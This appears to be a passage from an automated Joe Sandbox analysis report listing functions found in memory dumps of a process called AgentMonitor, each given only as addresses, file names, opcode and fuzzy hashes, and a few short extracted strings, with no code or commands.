                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae30000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 638111ef3649b353bdc39b03c0694c9da5c45391e71bfe8a2abef34d8f54c6e2
                                      • Instruction ID: 8ec5ea95863720989b3aa539c3c3670491362ea2b06817c5beb6d820e70cc324
                                      • Opcode Fuzzy Hash: 638111ef3649b353bdc39b03c0694c9da5c45391e71bfe8a2abef34d8f54c6e2
                                      • Instruction Fuzzy Hash: 940193B0D589698FEBD4FF18C895BA8B7A1FB68300F2041E5D41DD3285CE3869858F41
                                      Function 00007FFB4AE20C50 Relevance: .0, Instructions: 37COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7ca83069bc7ea6561da0aac3f45aae5c45f3888dadcb5594407091712c25aba9
                                      • Instruction ID: 0463cf144e964b3b0b39335b9a1986cf5997bcca3feb33d7fcc490f86479bbc5
                                      • Opcode Fuzzy Hash: 7ca83069bc7ea6561da0aac3f45aae5c45f3888dadcb5594407091712c25aba9
                                      • Instruction Fuzzy Hash: 44018FB194D3888FE702EF74C55419D7FB0FF46310F2441E6C451DB292D6385A488741
                                      Function 00007FFB4AE349AB Relevance: .0, Instructions: 35COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae30000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 33ad95c031b5cb018e629114cb2faec1cf01f8ee115a59977accfe8bff6c84a0
                                      • Instruction ID: 64720e1b25ea8293cb4c87e5f5ac3b95bea055ce8ffc339e62f8715cec08874d
                                      • Opcode Fuzzy Hash: 33ad95c031b5cb018e629114cb2faec1cf01f8ee115a59977accfe8bff6c84a0
                                      • Instruction Fuzzy Hash: D6F02EB1A8C92B4BF354BE6CC9102B93288FF04312F3481F2E42EC31C2DE28E8018381
                                      Function 00007FFB4AE20B77 Relevance: .0, Instructions: 34COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6105db3d1276f9be6e242e98b429d1c618792c8f58fc7f4dd2f29a386901320e
                                      • Instruction ID: d8a32f4bfbe6ce844a8908b9ea1f6f97fe960db61f8f76b00a7c82b819b94a4b
                                      • Opcode Fuzzy Hash: 6105db3d1276f9be6e242e98b429d1c618792c8f58fc7f4dd2f29a386901320e
                                      • Instruction Fuzzy Hash: 40F0A03515EA49CFD742EF3CC8E54D4BB60FF06204B9A02EAD089CB5A2D315585ECB41
                                      Function 00007FFB4AE5A7E9 Relevance: .0, Instructions: 33COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE51000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae51000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fa11429e7beccfbe513a5d0d9b5b5e0a4fcf266d16311af112fab4bf4d9426eb
                                      • Instruction ID: 8f6fd5cae620c3a62363a0e997e33b5d417895487418980ceb0badd406bc9524
                                      • Opcode Fuzzy Hash: fa11429e7beccfbe513a5d0d9b5b5e0a4fcf266d16311af112fab4bf4d9426eb
                                      • Instruction Fuzzy Hash: 03F0E522B4DBC84FC729A62D5869061BFF1DB9B21234941FFC096C72A3ED58AC858341
                                      Function 00007FFB4AE5AF30 Relevance: .0, Instructions: 32COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE51000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae51000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0045ac575cd94e53b09af01496233b86b399e16d59e17e10ad1d26a3811efa54
                                      • Instruction ID: 23ba567443924004867d876d95cebd3e7d3ecc84f0bc33db33a96079a7a1a20a
                                      • Opcode Fuzzy Hash: 0045ac575cd94e53b09af01496233b86b399e16d59e17e10ad1d26a3811efa54
                                      • Instruction Fuzzy Hash: DBF0BEE1A0E94A4EE689FEE8919E3B876C6FB58300FB400B9D41CC328BCE2C68455751
                                      Function 00007FFB4AE5B75F Relevance: .0, Instructions: 31COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE51000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae51000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 32b903ef50eeb095308e837bc974c86ef129ee80c1e7b1f739d938804c7ed8cf
                                      • Instruction ID: 744dc422681f153ed809004df15aaf6aec155ca92c04f14dcd60f1bfb43c94a6
                                      • Opcode Fuzzy Hash: 32b903ef50eeb095308e837bc974c86ef129ee80c1e7b1f739d938804c7ed8cf
                                      • Instruction Fuzzy Hash: E5E09291B1AD0D4A9B8DFB3CA4955FD6381EBA822131043B7DC0EC214FDD28986A8380
                                      Function 00007FFB4AE5A379 Relevance: .0, Instructions: 30COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE51000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae51000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fd2acc4e6946023a8cb6fad64d094354f4de3d9796f7a4bc323960c71169f6bb
                                      • Instruction ID: db3c864b44fa7e9cc24430b3b7749079fc2185206c5d72495384e2f2e808777c
                                      • Opcode Fuzzy Hash: fd2acc4e6946023a8cb6fad64d094354f4de3d9796f7a4bc323960c71169f6bb
                                      • Instruction Fuzzy Hash: 35E0227150E7C04FCB0AAA7888694947FA0EFA721138A42EFC045CF1E3EA2CCC89C700
                                      Function 00007FFB4AE5A2E9 Relevance: .0, Instructions: 30COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE51000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae51000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8910096e4b25cd96ab5b91bd47d4cd416830b5c2c8e4fe302a4996d8faa950f5
                                      • Instruction ID: bc684f57de77af7b64e8bde8c7e8324177417a8a14462804f435e2f17eac86e1
                                      • Opcode Fuzzy Hash: 8910096e4b25cd96ab5b91bd47d4cd416830b5c2c8e4fe302a4996d8faa950f5
                                      • Instruction Fuzzy Hash: 03F0E57150E7C04FC706AA78882A4507FA0EF6721134A46EFC045CF1A3EA2D8C88C701
                                      Function 00007FFB4AE57764 Relevance: .0, Instructions: 25COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE51000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae51000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1873a204f1d78a7ec7499eb79eac0a002f90481d2742af274503eded9f20c23b
                                      • Instruction ID: b9af919eb31cce9f8e6863d8699c33c9312a37cabdee87269b73062ca172f42c
                                      • Opcode Fuzzy Hash: 1873a204f1d78a7ec7499eb79eac0a002f90481d2742af274503eded9f20c23b
                                      • Instruction Fuzzy Hash: EBE0E56198E7C04FC75B9B7498688947FB0EE57210B5A94EEC089CF5E3D669884ACB02
                                      Function 00007FFB4AE5D679 Relevance: .0, Instructions: 24COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE51000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae51000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c315b5d5c893c893f62e841b520169d6e99c76195995479546504b0431bfa4e3
                                      • Instruction ID: 61535069227832296e1d1dd4945f1f8e369c29526ace014b2f2ef2469075da1e
                                      • Opcode Fuzzy Hash: c315b5d5c893c893f62e841b520169d6e99c76195995479546504b0431bfa4e3
                                      • Instruction Fuzzy Hash: B8E04F6284E7C04FCB0B9B7488A88903FA0EF6721179A40EBC045CF5F3D959CC4AC701
                                      Function 00007FFB4AE35318 Relevance: .0, Instructions: 23COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae30000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 162256fb4bdedd09d5557309124cba62a27418c9cc92d47c4feb75015d5e9647
                                      • Instruction ID: a9a8a3414ed3b84afaf0ebd293c12d9c7879e6e9025bd12fd6ea6e6473a9eaaf
                                      • Opcode Fuzzy Hash: 162256fb4bdedd09d5557309124cba62a27418c9cc92d47c4feb75015d5e9647
                                      • Instruction Fuzzy Hash: A7D05E30B64A094B8B0CBA3D8458470B3D9F7AA60A7E452B8940BC2281ED25ECC6CB80
                                      Function 00007FFB4AE33B50 Relevance: .0, Instructions: 22COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae30000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                      • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                      • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                      • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                      Function 00007FFB4AE346B2 Relevance: .0, Instructions: 22COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae30000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bc4a196b34808cfd6b84f2a57bb201bd680e12675eec2e2c3e975727098e516a
                                      • Instruction ID: 6361f42355e304583f92bab5af10a385bd7b2a1ca67d2c7d32bd2ee41946bbb2
                                      • Opcode Fuzzy Hash: bc4a196b34808cfd6b84f2a57bb201bd680e12675eec2e2c3e975727098e516a
                                      • Instruction Fuzzy Hash: BDE04F7368C41687E6A5BE61C5615BA3387BFD4355F3402F7C42A871C1DDBC66068741
                                      Function 00007FFB4AE5A390 Relevance: .0, Instructions: 22COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE51000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae51000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                      Function 00007FFB4AE5A300 Relevance: .0, Instructions: 22COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE51000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae51000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                      Function 00007FFB4AE254B4 Relevance: .0, Instructions: 22COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 42e5b016fa398c5436d0dc47638afbd19aa405c7bb2db29d5ccadb24c69579e5
                                      • Instruction ID: 623cb5ec3db3bcdd7d5264b159ff907fbc61991654675882fca915e8515b09fc
                                      • Opcode Fuzzy Hash: 42e5b016fa398c5436d0dc47638afbd19aa405c7bb2db29d5ccadb24c69579e5
                                      • Instruction Fuzzy Hash: 85E0ED62A4C1164AFB94BE64D9607A96264FB89310F3440F89A5F933C1DD29AF448746
                                      Function 00007FFB4AE5D6F9 Relevance: .0, Instructions: 21COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE51000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae51000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8095d38e97042f70a250f3395fd6759b81ce9b8851febf29f12669596dde504b
                                      • Instruction ID: a0cf9faa42b3559fba3a7fac6c7922f2790eb2f23b7b6ade7c4bbd267cf7d704
                                      • Opcode Fuzzy Hash: 8095d38e97042f70a250f3395fd6759b81ce9b8851febf29f12669596dde504b
                                      • Instruction Fuzzy Hash: 2CE01A6294F7C44FC70BAB3488A89417F60AE1721174A40EBC085CF1A3D9198849C711
                                      Function 00007FFB4AE51E10 Relevance: .0, Instructions: 18COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE51000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae51000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                      Function 00007FFB4AE56D78 Relevance: .0, Instructions: 17COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE51000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae51000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d31f381c67c792aa8b9a58807c947a1ed5e3463b8d19660a1fa6eb388fe299d9
                                      • Instruction ID: 274bee5e5005abefa55f5eeb3bfa86e4dbe648ba7c0bd547efecab16565b7ff4
                                      • Opcode Fuzzy Hash: d31f381c67c792aa8b9a58807c947a1ed5e3463b8d19660a1fa6eb388fe299d9
                                      • Instruction Fuzzy Hash: 15D02230B908000F870CBA38D8488303390EB6A2037A000A8D00AC72B1D92ADC88CB40
                                      Function 00007FFB4AE5B618 Relevance: .0, Instructions: 17COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE51000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae51000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2917f0a7ebe4bb5b5e98b73bb87c05757e37cc19def6ec39ee00e5dc13468594
                                      • Instruction ID: d48857607c870562c3a927c2dfae14c7647601126c65630711a84f52b426d7d6
                                      • Opcode Fuzzy Hash: 2917f0a7ebe4bb5b5e98b73bb87c05757e37cc19def6ec39ee00e5dc13468594
                                      • Instruction Fuzzy Hash: 63D01234B949044F8B0CBF38D8998747391EB6A216BA540A9E00AC72B5D96ADC89C741
                                      Function 00007FFB4AE206AD Relevance: .0, Instructions: 13COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c3b7aab64dee838a295e689a3a798708cac2788130635451790f04a3e475d4e4
                                      • Instruction ID: 68553e4231f3c787109ba703a82ca344d5f3ddda9307c0b9c347bb8c49fb501e
                                      • Opcode Fuzzy Hash: c3b7aab64dee838a295e689a3a798708cac2788130635451790f04a3e475d4e4
                                      • Instruction Fuzzy Hash: ADC08C83DCF51B00F4503E3ED6260ACA108BBCC320FF000F2C02C408D19C4D28C50147
                                      Function 00007FFB4AE212B8 Relevance: .0, Instructions: 12COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fc83376b931f8ce946cf24d21685bfbd0b7da6e4063c349d0c0860404292c2a9
                                      • Instruction ID: cbb027c749ba98a0956ca8649bce8f73cb55e5443490ea6b068c0e10e34a01f2
                                      • Opcode Fuzzy Hash: fc83376b931f8ce946cf24d21685bfbd0b7da6e4063c349d0c0860404292c2a9
                                      • Instruction Fuzzy Hash: 22C08C304908098FC948FF38C88480433A0FF0D300BE100D0E008CB170E219DCC0C781
                                      Function 00007FFB4AE236E2 Relevance: .0, Instructions: 10COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4703d9221eaabdcf5ee25377701550504ef25d02fbb3a61eb883ac8f443258bf
                                      • Instruction ID: b2fb0c95d2d4a879f6513697381b33168f963f44a961e006e639bc43e73398c6
                                      • Opcode Fuzzy Hash: 4703d9221eaabdcf5ee25377701550504ef25d02fbb3a61eb883ac8f443258bf
                                      • Instruction Fuzzy Hash: 89C08CC0F0DC1A53F12B3628C12117E00829F44701FA00074E42EE22CECE0E1A221282
                                      Function 00007FFB4AE206D0 Relevance: .0, Instructions: 8COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3412fc062b0ff17e6a50f7d6a26cba6d1f2ed094b5b7e19693b61daa9f350ee5
                                      • Instruction ID: 66bb24201a25f492608003d269a9a95cee25675911af2233b658dfaf55eacb86
                                      • Opcode Fuzzy Hash: 3412fc062b0ff17e6a50f7d6a26cba6d1f2ed094b5b7e19693b61daa9f350ee5
                                      • Instruction Fuzzy Hash: 5EB01241CDE40F00B4147F7A4A520647444BB8C300FF000F0D41D400C5988D18940243
                                      Function 00007FFB4AE21958 Relevance: .0, Instructions: 2COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 38e54fe49fa15eae383b72e86048e396ba71ef1e0d2bbbab247e4a4d3eb648cb
                                      • Instruction ID: 6db386aad6bf17fdad81bc8a041dc2d4c3adc625ac0fea1f06fdb560be99d77b
                                      • Opcode Fuzzy Hash: 38e54fe49fa15eae383b72e86048e396ba71ef1e0d2bbbab247e4a4d3eb648cb
                                      • Instruction Fuzzy Hash:

                                      Non-executed Functions

                                      Function 00007FFB4AE209B0 Relevance: 5.2, Strings: 4, Instructions: 193COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: c9$!k9$"s9$#{9
                                      • API String ID: 0-1692736845
                                      • Opcode ID: 0bdb4b08ef6dd072a53aac8ba31ce1bef71d74f03b5834344c17d8379a59499d
                                      • Instruction ID: f0d24af9354582a8bacff447595316fd0c5dbedd41495b30f0f31c9f1b29a123
                                      • Opcode Fuzzy Hash: 0bdb4b08ef6dd072a53aac8ba31ce1bef71d74f03b5834344c17d8379a59499d
                                      • Instruction Fuzzy Hash: 7251B4D7A0E22A85E1123ABDF4110FC6B489F45335B5883F3EE4D990C74E8865BB92F5

                                      Executed Functions

                                      Function 00007FFB4AE41125 Relevance: 1.7, Strings: 1, Instructions: 460COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae41000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: J
                                      • API String ID: 0-1141589763
                                      • Opcode ID: eced5bd1b05cf5feed7f1bccb892cbb99b9758df3248a46a63b1473162740334
                                      • Instruction ID: 4b8b5e43b84fc4dfb15f6141d823eeb5e35cd73316c088ede84034e66d6f1c31
                                      • Opcode Fuzzy Hash: eced5bd1b05cf5feed7f1bccb892cbb99b9758df3248a46a63b1473162740334
                                      • Instruction Fuzzy Hash: 86C19A61A9D6760BE71D7E388E420B5779EFBD2201B3886BDD4EBC7187D91CE4074281
                                      Function 00007FFB4AE10D48 Relevance: 1.5, Strings: 1, Instructions: 260COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae10000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 5Z_H
                                      • API String ID: 0-3267294416
                                      • Opcode ID: b3512f247ef8c711ffad4fc3bc82b8acb434c60b761b2d701ae0292b1d7c51d6
                                      • Instruction ID: 26ad615587c789fbd470abe226e4b2fcbf947fea123fe933f382266596852274
                                      • Opcode Fuzzy Hash: b3512f247ef8c711ffad4fc3bc82b8acb434c60b761b2d701ae0292b1d7c51d6
                                      • Instruction Fuzzy Hash: 7391E1F1A1DAAA8FE789EF68C8657A97FE1FB59300F1001FAC059C72D2DA781815C741
                                      Function 00007FFB4AE21142 Relevance: 9.7, Strings: 7, Instructions: 917COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: HKJ$HVJ$X_J$`[J$hIJ$hxJ$pJ
                                      • API String ID: 0-2008210366
                                      • Opcode ID: bead623ee2d512702acee2014ea35bfe652a73af9b46f115cff0c44f26e181d6
                                      • Instruction ID: 4df331074fbeada4db3fbdf9345c2f44429aea39a8a2c4771358e603d78bd746
                                      • Opcode Fuzzy Hash: bead623ee2d512702acee2014ea35bfe652a73af9b46f115cff0c44f26e181d6
                                      • Instruction Fuzzy Hash: 6D62E3B1A5D91A4FE798FF38C4A16B87396FF98300F2406F9D41DC3286DD28AD468781
                                      Function 00007FFB4AE43515 Relevance: 1.5, Strings: 1, Instructions: 297COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae41000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: J_H
                                      • API String ID: 0-326533465
                                      • Opcode ID: 63a56664b13e3e26d823b93d6437056c089df8751edb90165dbb13e53a263826
                                      • Instruction ID: 1023ae565ba502fe1ecfca35b04b16041cd7a97893e51adbc90081fc7e5a4db4
                                      • Opcode Fuzzy Hash: 63a56664b13e3e26d823b93d6437056c089df8751edb90165dbb13e53a263826
                                      • Instruction Fuzzy Hash: B791F5A1A5CA5B5FF788FE38C4562B976CDFBA4300F2441F9D45EC7287DD2868494381
                                      Function 00007FFB4AE108D0 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
